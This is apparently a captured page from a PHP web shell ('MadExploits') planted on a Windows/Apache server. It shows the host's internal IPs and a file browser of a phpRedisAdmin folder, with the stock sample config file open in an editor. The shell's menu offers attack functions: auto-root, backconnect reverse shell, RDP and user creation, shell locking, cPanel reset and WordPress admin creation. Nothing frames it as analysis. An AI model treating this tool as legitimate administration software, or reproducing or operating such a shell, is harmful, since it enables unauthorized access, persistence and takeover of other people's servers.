Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
laragon /
etc /
apps /
phpRedisAdmin /
includes /
[ HOME SHELL ]
Name
Size
Permission
Action
common.inc.php
3.07
KB
-rw-rw-rw-
config.environment.inc.php
1.12
KB
-rw-rw-rw-
config.sample.inc.php
3.28
KB
-rw-rw-rw-
footer.inc.php
16
B
-rw-rw-rw-
functions.inc.php
2.83
KB
-rw-rw-rw-
header.inc.php
1.04
KB
-rw-rw-rw-
login.inc.php
4.89
KB
-rw-rw-rw-
page.inc.php
310
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.sample.inc.php
<?php //Copy this file to config.inc.php and make changes to that file to customize your configuration. $config = array( 'servers' => array( array( 'name' => 'local server', // Optional name. 'host' => '127.0.0.1', 'port' => 6379, 'filter' => '*', 'scheme' => 'tcp', // Optional. Connection scheme. 'tcp' - for TCP connection, 'unix' - for connection by unix domain socket 'path' => '', // Optional. Path to unix domain socket. Uses only if 'scheme' => 'unix'. Example: '/var/run/redis/redis.sock' 'hide' => false, // Optional. Override global setting. Hide empty databases in the database list. // Optional Redis authentication. //'auth' => 'redispasswordhere' // Warning: The password is sent in plain-text to the Redis server. ), /*array( 'host' => 'localhost', 'port' => 6380 ),*/ /*array( 'name' => 'local db 2', 'host' => 'localhost', 'port' => 6379, 'db' => 1, // Optional database number, see http://redis.io/commands/select 'databases' => 1, // Optional number of databases (prevents use of CONFIG command). 'filter' => 'something:*', // Show only parts of database for speed or security reasons. 'seperator' => '/', // Use a different seperator on this database (default uses config default). 'flush' => false, // Set to true to enable the flushdb button for this instance. 'charset' => 'cp1251', // Keys and values are stored in redis using this encoding (default utf-8). 'keys' => false, // Use the old KEYS command instead of SCAN to fetch all keys for this server (default uses config default). 'scansize' => 1000 // How many entries to fetch using each SCAN command for this server (default uses config default). ),*/ ), 'seperator' => ':', 'showEmptyNamespaceAsKey' => false, // Hide empty databases in the database list (global, valid for all servers unless set at server level) 'hideEmptyDBs' => false, // Uncomment to show less information and make phpRedisAdmin fire less commands to the Redis server. Recommended for a really busy Redis server. //'faster' => true, // Uncomment to enable HTTP authentication /*'login' => array( // Username => Password // Multiple combinations can be used 'admin' => array( 'password' => 'adminpassword', ), 'guest' => array( 'password' => '', 'servers' => array(1) // Optional list of servers this user can access. ) ),*/ // Use HTML form/cookie-based auth instead of HTTP Basic/Digest auth 'cookie_auth' => false, /*'serialization' => array( 'foo*' => array( // Match like KEYS // Function called when saving to redis. 'save' => function($data) { return json_encode(json_decode($data)); }, // Function called when loading from redis. 'load' => function($data) { return json_encode(json_decode($data), JSON_PRETTY_PRINT); }, ), ),*/ // You can ignore settings below this point. 'maxkeylen' => 100, 'count_elements_page' => 100, // Use the old KEYS command instead of SCAN to fetch all keys. 'keys' => false, // How many entries to fetch using each SCAN command. 'scansize' => 1000 );
Close